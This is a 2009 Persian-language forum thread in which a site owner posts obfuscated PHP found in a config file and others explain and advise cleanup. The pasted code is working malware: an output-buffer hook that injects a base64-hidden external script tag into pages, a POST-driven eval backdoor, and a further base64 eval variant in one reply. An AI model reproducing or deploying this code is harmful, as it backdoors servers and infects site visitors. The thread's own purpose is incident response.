داشتم هک میشدم !!!

foranyone · Oct 13, 2009

سلام تو فایل کانفیگ یکی از سایت هام عبارات زیر درج شده بود سر در نیاوردم چی بود !!

PHP:

<?php 

if(!isset($o5r1)){
function o5r($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v)
if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);

if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
$s=str_replace($v,'',$s);}
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
foreach($a[0] as $v)
if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2stc2hvZy5jb20vdmIvM3NsM181My5waHAgPjwvc2NyaXB0Pg=='),'',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
elseif(strpos($s,',a'))$s.=$a;
return $s;
}
function o5r2($a,$b,$c,$d){global $o5r1;$s=array();if(
function_exists($o5r1))call_user_func($o5r1,$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='o5r')return;
elseif($a=='ob_gzhandler')break;
else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('o5r');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$o5rl=(($a=@set_error_handler('o5r2'))!='o5r2')?$a:0;eval(base64_decode($_POST['e']));



?>

ببینین میتونین تشخیص بدین عملکرد این کد چیه ؟

BehrouzPc · Oct 14, 2009

بله این کد اولا توی پوشه images تون یه فایل به نام image.php ساخته ، چک کنید
تمام فایل های پی اچ پی که توشون تگ HTML وجود داشته رو چک کن
و هر چی با نام config , admin , function شروع میشه رو هم حتما چک کن
این کد فایل های روی وبساتون رو آلوده به یه iframe می کند برای حمله به سایت شما...
در ضمن وبسایت شما در صورت آلوده شدن در گوگل به عنوان ویروسی نمایش داده میشه

تا گسترش پیدا نکرده کاملا چک کنید

در ضمن این ویروز از طریق کاپیوتر شما و نر مافزاری اف تی پی تون وارد ساتتنون میشه

ziXet · Oct 16, 2009

foranyone گفت:

سلام تو فایل کانفیگ یکی از سایت هام عبارات زیر درج شده بود سر در نیاوردم چی بود !!

PHP:

<?php 

if(!isset($o5r1)){
function o5r($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0] as $v)
if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);

if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromcharcode')))||($e&&strpos($v,'document.write')))
$s=str_replace($v,'',$s);}
if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
foreach($a[0] as $v)
if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('phnjcmlwdcbzcmm9ahr0cdovl2stc2hvzy5jb20vdmivm3nsm181my5wahagpjwvc2nyaxb0pg=='),'',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
elseif(strpos($s,',a'))$s.=$a;
return $s;
}
function o5r2($a,$b,$c,$d){global $o5r1;$s=array();if(
function_exists($o5r1))call_user_func($o5r1,$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])=='o5r')return;
elseif($a=='ob_gzhandler')break;
else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('o5r');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$o5rl=(($a=@set_error_handler('o5r2'))!='o5r2')?$a:0;eval(base64_decode($_post['e']));



?>

ببینین میتونین تشخیص بدین عملکرد این کد چیه ؟

عزیزم هک شدی خبر نداری :دی
پیشنهاد میکنم با مدیریت هاستینگ تماس بگیرید.

YTERROR · Oct 16, 2009

بله این کد اولا توی پوشه images تون یه فایل به نام image.php ساخته ، چک کنید
تمام فایل های پی اچ پی که توشون تگ HTML وجود داشته رو چک کن
و هر چی با نام config , admin , function شروع میشه رو هم حتما چک کن
این کد فایل های روی وبساتون رو آلوده به یه iframe می کند برای حمله به سایت شما...
در ضمن وبسایت شما در صورت آلوده شدن در گوگل به عنوان ویروسی نمایش داده میشه

تا گسترش پیدا نکرده کاملا چک کنید

در ضمن این ویروز از طریق کاپیوتر شما و نر مافزاری اف تی پی تون وارد ساتتنون میشه

تنها راه جلوگیری که نه پاکسازی بک آپ گیری از دیتابیس و فایلهای هاست و درخواست حذف اکانت شما از طریق WHM و ساخت مجدد اکانت سپس اسکن کردن فایل های بک آپ از طریق NOD4 آپدیت شده و چک کردن کلیه فایلهای Index.php و HTML و مواردی که دوستمون در بالا گفت و حذف لاین آخر و بعضی اوقات لاین 1 که شاید با کد :

PHP:

<?php  eval(base64_decode('aWYoIWlzc2V0KCRheWhkMSkpe2Z1bmN0aW9uIGF5aGQoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwybGpZWFF1WVdNdWFXNHZiM1YwY21WaFkyZ3  ZhMjV2ZDJ4bFpHZGxYMkp5YVdkaFpHVXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gYXloZDIoJGEsJGIsJGMsJGQpe2dsb2JhbCAkYXloZDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGF5aGQxKSljYWxsX3VzZXJfZnVuYygkYXloZDEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSkgYXMgJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nYXloZCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic

شروع شده باشد و آپلود مجدد فایلها بروی هاست ....

در صورتی این کارو تا چند روز آینده نکنید کلیه فایلهاتون دچار این مشکل می شوند و هر کرس وارد سایت شما میشه در صورتی که Adobe Acrobat روی سیستمش نصب باشه ویندوز و اگسپلور اون فرد هم ویروسی می شود

موفق و پیروز باشید

foranyone · Oct 16, 2009

منقبلا روی سرور پویاسازان دچار این مشکل شده بودم الان اومدم روی سرور میهن نیک !

بازم این بلا سرم اومدم ! ظاهرا پاک کردن هاست هیچ کمیک نمیکنه ! :-?

دونه دونه ی فایل ها رو باز میکنم پاک میکنم بازم این ایراد هست !

یه سوال پرمیژن فایلی رو که رو 644 میزارم چرا باید تغیر کنه !!!!!!!!!

winsent · Oct 16, 2009

YTERROR · Oct 17, 2009

منقبلا روی سرور پویاسازان دچار این مشکل شده بودم الان اومدم روی سرور میهن نیک !

بازم این بلا سرم اومدم ! ظاهرا پاک کردن هاست هیچ کمیک نمیکنه !

دونه دونه ی فایل ها رو باز میکنم پاک میکنم بازم این ایراد هست !

یه سوال پرمیژن فایلی رو که رو 644 میزارم چرا باید تغیر کنه !!!!!!!!!

دوست عزیز من پله به پله براتون توضیح دادم بصورت خلاصه من خودم چند تا از سایتام که روی یک سرور بودن به همین مشکل دچار شد از جمله سایت شخصیم و با این راه مشکلم رفع شد شما از طریق این لینک می تونید پام گوگل رو ببینید :